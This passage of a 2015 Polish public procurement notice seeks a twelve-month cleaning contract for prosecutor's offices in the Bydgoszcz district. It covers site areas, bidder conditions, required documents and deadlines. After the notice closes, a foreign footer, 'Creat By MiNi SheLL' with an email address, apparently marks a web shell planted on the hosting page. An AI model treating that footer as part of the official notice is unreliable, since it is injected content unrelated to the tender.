	Zamiatanie chodników, schodów, podjazdu, parkingów	w razie wystąpienia potrzeby, jednak nie rzadziej niż raz na miesiąc
	Opróżnianie popielniczek, pojemników na śmieci, utrzymywanie ich w czystości	w razie wystąpienia potrzeby
	Wymiana worków na śmieci w pojemnikach	w razie wystąpienia potrzeby
	Wyrzucanie śmieci, nieczystości do kontenerów	w razie wystąpienia potrzeby
	Grabienie i zbieranie liści do worków oraz ich wywóz transportem własnym Wykonawcy w zależności od potrzeb. Koszenie trawy i przycinanie krzewów.	w razie wystąpienia potrzeby, w okresie zwiększonego natężenia spadających liści nie rzadziej niż raz na tydzień
	Podlewanie drzewek i krzewów oraz innych roślin	W razie wystąpienia potrzeby, natomiast w sezonie letnim nie rzadziej niż co drugi dzień
	Bieżące usuwanie śniegu, lodu, błota pośniegowego, oblodzenia z chodników, schodów, podjazdów dla niepełnosprawnych, dachów, wjazdów na parking oraz powierzchni parkingu; utrzymywanie w czystości głównych wejść do budynku oraz wyjść ewakuacyjnych - w tym zapobieganie śliskości i oblodzenia; posypywanie ww. powierzchni  piaskiem i solą, załadunek i wywóz śniegu w sytuacji braku możliwości dalszego składowania usuwanego śniegu na terenie Zamawiającego.	w razie wystąpienia niezwłocznie lub wg ustaleń z Zamawiającym



2.2.2. POWIERZCHNIE OBIEKTÓW, OKIEN W OBIEKTACH ORAZ TERENÓW PRZYLEGŁYCH DO BUDYNKÓW PROKURATUR OKRĘGU BYDGOSKIEGO PRZEZNACZONYCH DO SPRZĄTANIA
LP	Obiekt	Pow. biurowa _m2_	Pow. terenu _m2_	Krótki opis terenu	Pow. okien dwustronna _szyby + ramy_ _m2_
	Ul. Okrzei 10, Bydgoszcz	2400	ok. 1100	Parking wewnętrzny	800 
_bez witryn klatkowych, na holu oraz nad wejściem głównym w bud. Okrzei 10_
			ok. 1422	Parking wewnętrzny	
			ok. 150	Teren zielony	
	Ul. Farna 6, Bydgoszcz	418	ok. 18	Chodnik przed budynkiem	105
	Ul. Przyrzecze 2-4, Bydgoszcz	950	ok. 30	Chodniki	290
			ok. 40	Taras od strony Brdy	
	Ul. Nowy Rynek 10, Bydgoszcz	1127	-	-	320
	Ul. Zamojskiego 16, Bydgoszcz	540	ok. 800	Parking wewnętrzny	187
			ok. 60	Teren zielony	
	ul. Ogrodowa 14, Szubin	318	ok. 480	Parking wewnętrzny	100
			ok. 1720	Teren zielony	
	ul. Benedyktyńska 5, Mogilno	400	ok. 110	Parking zewnętrzny	107
	ul. Sądowa 1-3, Nakło	352	ok. 220	Chodniki	130
			ok.120	Teren zielony	
	ul.10 Lutego 9, Świecie	350	ok. 30	Chodniki	100
			ok. 630	Parking wewnętrzny	
	ul. Świecka 6, Tuchola 	210	ok. 40	Chodniki	60
			ok. 40	Parking wewnętrzny	
	ul. Roosevelta 23, Inowrocław	950	ok. 200	Chodniki	220
			ok. 600	Parking wewnętrzny	
			ok. 1250	Teren zielony	
	ul. Sądowa 2, Żnin	100	------	------	55

Sprzątanie terenów zewnętrznych będzie polegało na utrzymaniu czystości łącznie z wjazdami, przyległymi chodnikami oraz parkingami. W okresie opadów śniegu oraz temperatury powodującej gołoledź i oblodzenie, a w szczególności po nocnych opadach śniegu, należy usunąć śnieg przed godz. 7:00 z powierzchni wymienionych w powyższej tabeli.
Do sprzątania wnętrz jak i terenów zewnętrznych Wykonawca użyje własnego sprzętu oraz własnego piasku i soli oraz innych niezbędnych materiałów. 
Sprzęt i materiały niezbędne do wykonania przedmiotu umowy Wykonawca będzie dostarczał własnym transportem i na własny koszt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.92.00-4, 90.91.40.00-7, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 3 głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - Załącznik numer 4 do SIWZ;
Dowodami, o których mowa wyżej są:
- Poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
- W przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej
- W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. niniejszym punkcie.
Poprzez zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć realizację przynajmniej jednej z wymienionych usług, której wartość była nie mniejsza niż 120.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien przedłożyć oświadczenie, że dysponuje potencjałem technicznym a także osobami zdolnymi do wykonania Zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - załącznik nr 2 do SWIZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykaz co najmniej 12 pracowników serwisu sprzątającego, którzy będą uczestniczyć w wykonaniu zamówienia z rozbiciem na poszczególne jednostki, w których świadczona będzie usługa sprzątania, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami
b. Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, obejmujący co najmniej 2 pracowników kontroli jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Doświadczenie - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i są dopuszczalne  tylko w przypadku:
a. zmiany przepisów określających stawki podatku VAT w odniesieniu do cen za świadczone usługi, cena zostanie stosownie zmieniona. Zmianie podlegać będzie kwota brutto świadczonych usług.
b. zmiany godzin pracy pracowników sprzątających pomieszczenia, z zachowaniem dotychczasowej ilości godzin pracy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bydgoszcz.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Bydgoszczy, ul. Okrzei 10, 85-317 Bydgoszcz, pokój 107..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2015 godzina 09:00, miejsce: Prokuratura Okręgowa w Bydgoszczy, ul. Okrzei 10, 85-317 Bydgoszcz, pokój 107..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com